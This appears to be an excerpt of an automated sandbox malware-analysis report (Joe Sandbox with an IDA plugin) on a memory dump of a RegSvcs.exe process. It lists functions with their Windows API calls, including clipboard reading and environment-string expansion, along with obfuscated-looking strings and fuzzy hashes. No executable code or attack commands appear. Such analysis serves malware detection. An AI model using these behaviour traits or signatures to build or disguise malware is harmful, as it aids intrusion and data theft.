                                                                      • Instruction Fuzzy Hash: 7A11A1742046428BEB058F24D8A1BB7BBF2EF56300F5885A9D196DB392D738DC86CB54
                                                                      APIs
                                                                      • GetUserDefaultUILanguage.KERNELBASE ref: 0043AAAF
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DefaultLanguageUser
                                                                      • String ID:
                                                                      • API String ID: 95929093-0
                                                                      • Opcode ID: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
                                                                      • Instruction ID: 2db82b081659a11ebf0adced019d600d4025aec70a5b2eba15313fbfae0b0d52
                                                                      • Opcode Fuzzy Hash: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
                                                                      • Instruction Fuzzy Hash: B0112636A482A58FD719DB3CCA4476DBFA26F8A300F0980ADC4C997385CB789D60C753
                                                                      APIs
                                                                      • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B51C,00000000,00000001), ref: 00440292
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
                                                                      • Instruction ID: 9d73e3fc9da24b4a25dc6ea464106973b4d99c6e73c38ef93f1a8f1a834cd47d
                                                                      • Opcode Fuzzy Hash: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
                                                                      • Instruction Fuzzy Hash: EFF0203A909200EBE2006F2ABC05A173668BF8A325F020876F000D31A5D738E8218A9B
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: BlanketProxy
                                                                      • String ID:
                                                                      • API String ID: 3890896728-0
                                                                      • Opcode ID: 6d4444b6b1bf2a15e57e1771f38e3a021ca3fddd5c8aadccf2c8c010083366ee
                                                                      • Instruction ID: 3c134e449782a57cf71f1962354a437f9829e02efeb86ae6b61234eae4da8937
                                                                      • Opcode Fuzzy Hash: 6d4444b6b1bf2a15e57e1771f38e3a021ca3fddd5c8aadccf2c8c010083366ee
                                                                      • Instruction Fuzzy Hash: 62F0ED752097028FE300CF24C59874BBBF2BB88304F25891CE4A44B394D7B9AA49CFC2
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: BlanketProxy
                                                                      • String ID:
                                                                      • API String ID: 3890896728-0
                                                                      • Opcode ID: 2e53f1206323ee2cade14c3224eb0fa84b417d36bb7d5e7098e7bca86b682ba1
                                                                      • Instruction ID: 64921bb5e8d0d2665883c7be70a8893bafea9755363c5f099f224ef3642789f1
                                                                      • Opcode Fuzzy Hash: 2e53f1206323ee2cade14c3224eb0fa84b417d36bb7d5e7098e7bca86b682ba1
                                                                      • Instruction Fuzzy Hash: 29F07AB4109701CFE311DF64C5A4B5ABBF0FB85304F11985CE4958B3A1D7B59A49CF92
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B51C,00000000,00000001), ref: 0043E87E
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
                                                                      • Instruction ID: edab8ee5216d5c962334db0beb90db3a31f2e897247f77843e17d527c4ab1b3a
                                                                      • Opcode Fuzzy Hash: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
                                                                      • Instruction Fuzzy Hash: F0D0A734188121DFD7005F14FC05B873758DF0A351F020872B404AB1B5C234EC50C69C
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?,67660564,00408969,67660564), ref: 0043E850
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
                                                                      • Instruction ID: 1c12cdc91dcc22cd6618a30bc84945b256d08a32317763a8f107efb347479c5b
                                                                      • Opcode Fuzzy Hash: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
                                                                      • Instruction Fuzzy Hash: E4C09B31145120ABD5103F15FC05FC67F64DF45391F010465B00467076C760BC91C6DD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !h#n$&P%V$(X6^$)p*v$-tz$.D)J$.H>N$2{<u$4~|$7w$;T&Z$BpFv$G0]6$K4l:$Rd"j$T8e>$T`Zf$U\$_lYr$`g$o<KB${x$|,X2$8>$rp$tj$x~
                                                                      • API String ID: 0-2870231824
                                                                      • Opcode ID: df71505268c028ffb0bd486a89103a37c107dc5adc46b736a241bad54def65e1
                                                                      • Instruction ID: e4eadb167d9284e983c6371bd9484b3f2b8716763c332f31a73ee98d54a9440e
                                                                      • Opcode Fuzzy Hash: df71505268c028ffb0bd486a89103a37c107dc5adc46b736a241bad54def65e1
                                                                      • Instruction Fuzzy Hash: E53209B160C7D48AD334CF14C442BDFBAF2EB92304F00892DC5E96B215D7B6564A8B9B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !h#n$&P%V$(X6^$)p*v$-tz$.D)J$.H>N$2{<u$4~|$7w$;T&Z$BpFv$G0]6$K4l:$Rd"j$T8e>$T`Zf$U\$_lYr$`g$o<KB${x$|,X2$8>$rp$tj$x~
                                                                      • API String ID: 0-2870231824
                                                                      • Opcode ID: bb8f5c017a04f448ec77eaa504b06c268e6e3bd4e83d5db79ec8c788eea25bd9
                                                                      • Instruction ID: 85683be32e8b5f4f428226e946852424525cd865b1790a78dd48afa17569a373
                                                                      • Opcode Fuzzy Hash: bb8f5c017a04f448ec77eaa504b06c268e6e3bd4e83d5db79ec8c788eea25bd9
                                                                      • Instruction Fuzzy Hash: 423208B160C7D48AD334CF14C442BDFBAF2EB92304F40892DC5E96B215D7B6564A8B9B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: AtP$GpFv$LH$LH$[T
                                                                      • API String ID: 0-1191849916
                                                                      • Opcode ID: 9f8a8d8b39a13838edde9a1b50270b6620bdc73dc6028a05be0a7079155c4cee
                                                                      • Instruction ID: 4372fb21f11b9819d30698d9d45361d0369da0689afe6659426da76e72155524
                                                                      • Opcode Fuzzy Hash: 9f8a8d8b39a13838edde9a1b50270b6620bdc73dc6028a05be0a7079155c4cee
                                                                      • Instruction Fuzzy Hash: C872F275600B01CFD724CF29C8917A3B7B2FF8A314B19896DD8968B7A1D739E842CB54
                                                                      APIs
                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?,?,?,?,?,00000000,?), ref: 004164C7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentExpandStrings
                                                                      • String ID: AtP$GpFv$LH$LH$[T
                                                                      • API String ID: 237503144-1191849916
                                                                      • Opcode ID: 1b588242ea16f88214a7b3f74664b69940c21a90d5ac88c4a02d85973340d39e
                                                                      • Instruction ID: 33ac3c3fba2e5f2169ec6e70d98a4de6486b49fd6ba05196e176a44067b630e5
                                                                      • Opcode Fuzzy Hash: 1b588242ea16f88214a7b3f74664b69940c21a90d5ac88c4a02d85973340d39e
                                                                      • Instruction Fuzzy Hash: D83224756007018FC724CF29C8917A3B7F2FF96314B1A85ADD8968B7A1D739E842CB54
                                                                      APIs
                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00424698
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentExpandStrings
                                                                      • String ID: =jh$D6v4$}z
                                                                      • API String ID: 237503144-2424248051
                                                                      • Opcode ID: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
                                                                      • Instruction ID: 072dcfe1279749a49c563166b893412059df4ddb98baf7635cf88deb1ed00509
                                                                      • Opcode Fuzzy Hash: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
                                                                      • Instruction Fuzzy Hash: E071227560C3509FE7208F24EC4175FBBE4EBC2718F10892DF5A49B291DBB4980A8B96
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                      • String ID:
                                                                      • API String ID: 1006321803-0
                                                                      • Opcode ID: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
                                                                      • Instruction ID: b86dd0c9fbfd43ae0b58d105ee5404c8a2eb2c5d505c68a19c0745f829c1e84f
                                                                      • Opcode Fuzzy Hash: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
                                                                      • Instruction Fuzzy Hash: C941D1B1908B529FD700AF7C988925ABFA0AB06320F05873EE8E5973C6D3389555C797
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: AtP$GpFv$LH
                                                                      • API String ID: 0-40351562
                                                                      • Opcode ID: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
                                                                      • Instruction ID: 6bb0aad597ceb399f229923281458bf5411d9ceb9ec5dfacab6a3e1016280f03
                                                                      • Opcode Fuzzy Hash: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
                                                                      • Instruction Fuzzy Hash: 04C1F275200B018FC725CF29C891663B7F2FF96314B1A896ED8968B7A5E778F841CB44
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: KWYb$R^lf$V]E^$[NC~$puGG
                                                                      • API String ID: 0-3448173581
                                                                      • Opcode ID: 68f8decb0507b526bb0b8b235139426a9b71c66a9f93ba188218d6a7d3b065e7
                                                                      • Instruction ID: 136c07a549b812a85170c773b68f542c8dc67558d112d0f44613d1a83f6642fd
                                                                      • Opcode Fuzzy Hash: 68f8decb0507b526bb0b8b235139426a9b71c66a9f93ba188218d6a7d3b065e7
                                                                      • Instruction Fuzzy Hash: 18E16475608601DFC7248F29CC816A777B2FF8A310F19857ED5568B7A1E739E842CB48
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <$C|$WR$~Bzx$~|
                                                                      • API String ID: 0-1711356705
                                                                      • Opcode ID: 759e3f713937f53d1145da5574e760211f3564257749ddce68042d6697c28895
                                                                      • Instruction ID: c242de3d159764505c2276e72245a45d8931141d93d3f41c6525b63a99f65b4f
                                                                      • Opcode Fuzzy Hash: 759e3f713937f53d1145da5574e760211f3564257749ddce68042d6697c28895
                                                                      • Instruction Fuzzy Hash: 3BD1287664C3504BD318CF29885126FBBE3ABC2314F19897EE4D5AB381C779C90A8787
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2$76$745:2$76$_\]$p@
                                                                      • API String ID: 0-2055486527
                                                                      • Opcode ID: 692f9ee771d2d81641aa3ae234354e2c9c2a2707556fcb6c8f5c436a55a784cf
                                                                      • Instruction ID: d14b64437fda7db03077973c55caa55540a0466a372fa5b5a151a26c722ec16b
                                                                      • Opcode Fuzzy Hash: 692f9ee771d2d81641aa3ae234354e2c9c2a2707556fcb6c8f5c436a55a784cf
                                                                      • Instruction Fuzzy Hash: 5CD1CF716183508FD724CF64D891BABBBF0EF95318F04882DE98587392E7B9E845CB46
                                                                      APIs
                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042A8EB
                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042A97D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentExpandStrings
                                                                      • String ID: ~
                                                                      • API String ID: 237503144-2894255414
                                                                      • Opcode ID: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
                                                                      • Instruction ID: 0060a675a86d7ee076ee5ed7f34d7278311ae35c8cfae6d949a6dc28de4d3802
                                                                      • Opcode Fuzzy Hash: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
                                                                      • Instruction Fuzzy Hash: A351FEB56483459FE350DF61AC81A2FBBB9EB86704F00583CF6809B291DBB0D40ACB47
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $&?3$0-/?$99C?$;(?>
                                                                      • API String ID: 0-2409071036
                                                                      • Opcode ID: e133a7b7fa4b30eba9d8dd8762af5ae8fa74075651ce804875519ff4ab040977
                                                                      • Instruction ID: f66a5fe417f6b708e5f26068a280dd0292c096a76de8314330cd7006a92fc357
                                                                      • Opcode Fuzzy Hash: e133a7b7fa4b30eba9d8dd8762af5ae8fa74075651ce804875519ff4ab040977
                                                                      • Instruction Fuzzy Hash: 2AD15EB49007419FD720EF39D586752BFF0EB12300F544AAED8EA4B786D334A45ACB96
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$MP$`]0o$mooj
                                                                      • API String ID: 0-750224902
                                                                      • Opcode ID: b1852bd034d5f07e6c7418944058fbcc2db243f872094cebdf7b16bddf70df29
                                                                      • Instruction ID: b19b03646b16de912904001b94da70090da2d56033d31c768745f7e78282d27d
                                                                      • Opcode Fuzzy Hash: b1852bd034d5f07e6c7418944058fbcc2db243f872094cebdf7b16bddf70df29
                                                                      • Instruction Fuzzy Hash: EC71183150D3929AD711CF29849077BFFE1AF96344F1889BED4C4AB387C639890AC766
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >j%h$YF$]Z
                                                                      • API String ID: 0-4187760579
                                                                      • Opcode ID: 315e0b80a172105bdb6125941b7bc3327eb2f506a6e5818f00821b26c43edc6d
                                                                      • Instruction ID: 9eece3b8ce7a95ea6ecb53f0b37b23c6ac9ce84f3b4a74f9026e79692fb54b94
                                                                      • Opcode Fuzzy Hash: 315e0b80a172105bdb6125941b7bc3327eb2f506a6e5818f00821b26c43edc6d
                                                                      • Instruction Fuzzy Hash: CD02037160C3009BD7189F25C8916AFBBF2EFD5314F08892DE4D58B382E7399946C78A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6316093822C38AF1B960CC18D99B375A$JO}$no
                                                                      • API String ID: 0-1329957222
                                                                      • Opcode ID: 39d72df67d6d4dec9bb311bdf5152167ba102bc258e75940eeb29ed02a9edc23
                                                                      • Instruction ID: a84f769f8163236c19afa71ab8ebfca9a7e40634951dcb5e8a3fb7dd6940477d
                                                                      • Opcode Fuzzy Hash: 39d72df67d6d4dec9bb311bdf5152167ba102bc258e75940eeb29ed02a9edc23
                                                                      • Instruction Fuzzy Hash: 5AC1F3B160C3408BD718DF35D8916AFBBE2EBD2304F144A2DE5D29B392DA38C509CB56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )2^$khvr$|lx1
                                                                      • API String ID: 0-2191243274
                                                                      • Opcode ID: 4ccf6364555e8cdb5bfd8096454ae9d86d60a5367683d88ebbcbe3196d12286d
                                                                      • Instruction ID: 4de4a3a3beb6c19d42a4d3ade4e4e91008c027f5d3f459ded0861b50ff37b2bd
                                                                      • Opcode Fuzzy Hash: 4ccf6364555e8cdb5bfd8096454ae9d86d60a5367683d88ebbcbe3196d12286d
                                                                      • Instruction Fuzzy Hash: 27412974605691CBD7158F3AD490772BBA2AF9B304F5C85ADC4C78B396C6389846CB18
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(D7DADAD1), ref: 0042DE55
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID: 3Z{
                                                                      • API String ID: 3664257935-2331068373
                                                                      • Opcode ID: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
                                                                      • Instruction ID: 974a3689560b078f5541bff02c23d3e4bc65e838cbd55ddb6ad84d7362020e57
                                                                      • Opcode Fuzzy Hash: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
                                                                      • Instruction Fuzzy Hash: F641F1706047819FE7268F249890B63BFE1AF67304F28449DE4D65F392D72A9806CB65
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NP,?$EA
                                                                      • API String ID: 0-3550630486
                                                                      • Opcode ID: c8b8e796abceac3594a91b638e490a64fbfa8cc7ef476cca3c0e389b64e5e7b0
                                                                      • Instruction ID: 2e7f34938e04f27cbf53eb242d69fe801042e8981dab05c8edde02431b6dd9ba
                                                                      • Opcode Fuzzy Hash: c8b8e796abceac3594a91b638e490a64fbfa8cc7ef476cca3c0e389b64e5e7b0
                                                                      • Instruction Fuzzy Hash: 5E4222B4608201DBD7148F28E841BBB73A1FF86328F154A2DF591572E1E778EC55C78A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LMB$pv
                                                                      • API String ID: 0-122907696
                                                                      • Opcode ID: 600361d03a19618f7b8b94130096601f70c9cb3cba6cb4618556b265baeca412
                                                                      • Instruction ID: 3eeefadaa77a5fd53610c3ddf5e6e08206d1469657b97126345bc7f1514b4473
                                                                      • Opcode Fuzzy Hash: 600361d03a19618f7b8b94130096601f70c9cb3cba6cb4618556b265baeca412
                                                                      • Instruction Fuzzy Hash: 17E134B15183008BD3249F29C8623ABB7F1EFD2314F19892DD5C68B3A5E7799846C786
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NP,?$mij
                                                                      • API String ID: 0-1436015776
                                                                      • Opcode ID: b0905b15df5a93d70dff43b587df237d303d7f495d29f252faf92cbeebdeaadb
                                                                      • Instruction ID: d401854fd2cc12c548c1ecfb90c4d04a7bab5840ee8d20629697b9478a788be7
                                                                      • Opcode Fuzzy Hash: b0905b15df5a93d70dff43b587df237d303d7f495d29f252faf92cbeebdeaadb
                                                                      • Instruction Fuzzy Hash: BAA159756043109BD314DF25C8C162BB7A1EBC9728F24662EE9A5373D1D338EC018BDA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M"O$fI.K
                                                                      • API String ID: 0-3473069917
                                                                      • Opcode ID: 80b5e25900e62fa5b7f868b9038989c12ce663ab15b6782b2becc0f24b60a991
                                                                      • Instruction ID: 329e37de618e8a484b718af78b4319e64e69ed5ee2b204ae71a9d2e2a7026588
                                                                      • Opcode Fuzzy Hash: 80b5e25900e62fa5b7f868b9038989c12ce663ab15b6782b2becc0f24b60a991
                                                                      • Instruction Fuzzy Hash: 6431F275204691CBE7058F2AD450332FBE2EFA2310F69959DC0C69B392C679A8038B98
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M"O$fI.K
                                                                      • API String ID: 0-3473069917
                                                                      • Opcode ID: a50f177498f9f56b16f7faf9ec1f3eef4274cbe2d8e1a906e5367dc70dca7c59
                                                                      • Instruction ID: f6fd3104235a574d950e3c7a6e1b37e2e28bb9fd8ddddb0b7385076b5cae7f54
                                                                      • Opcode Fuzzy Hash: a50f177498f9f56b16f7faf9ec1f3eef4274cbe2d8e1a906e5367dc70dca7c59
                                                                      • Instruction Fuzzy Hash: 9531E4752047418BE705CF2AD850723FBE2EFA6310F69959DC0C59F392CA79A843CB88
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @uB
                                                                      • API String ID: 0-1161951709
                                                                      • Opcode ID: f8a3ba9d7d15869a0590316285b3361bbc22125b0af2a42800cc0a1cbe75883f
                                                                      • Instruction ID: 3f551a4cb18cdb69ea81a70624d177d743b65059aaf82db93a0913f8d0b3051b
                                                                      • Opcode Fuzzy Hash: f8a3ba9d7d15869a0590316285b3361bbc22125b0af2a42800cc0a1cbe75883f
                                                                      • Instruction Fuzzy Hash: BBA10FB560C300CFD714DF29E84162BB7E5FB86314F98482EF585A3251EB78E902CB5A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %=>?
                                                                      • API String ID: 0-1840824467
                                                                      • Opcode ID: e07febe003d47278271e69a6a0aefd5b767d6bdb8c9269540a4227fbb6a47e9b
                                                                      • Instruction ID: 2abc8e8e60c77c2f0b16dca8ff0b337e7e89a8bc06769c8938415a8ee5640db8
                                                                      • Opcode Fuzzy Hash: e07febe003d47278271e69a6a0aefd5b767d6bdb8c9269540a4227fbb6a47e9b
                                                                      • Instruction Fuzzy Hash: 3291F832F046664BC7108E2DCA8025BB7E1ABC5754F698A3EE8D4E73D5EA3CCC454789
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 79.'
                                                                      • API String ID: 0-3373235548
                                                                      • Opcode ID: 3052bdd5b9f525bfd9188c849dd4df91fdd9a95299ae7d6644acfbbe7ea22ffb
                                                                      • Instruction ID: 405c93bd9d9a1b956de89b764b78e8638e9be0a0d1f875f63fdafa76fe9ef724
                                                                      • Opcode Fuzzy Hash: 3052bdd5b9f525bfd9188c849dd4df91fdd9a95299ae7d6644acfbbe7ea22ffb
                                                                      • Instruction Fuzzy Hash: 4841E7745043A08BE7274B2A98A0733BFE1BF13305F68598DD0D21B792C26AA407CB55
                                                                      Strings
                                                                      Memory Dump Source
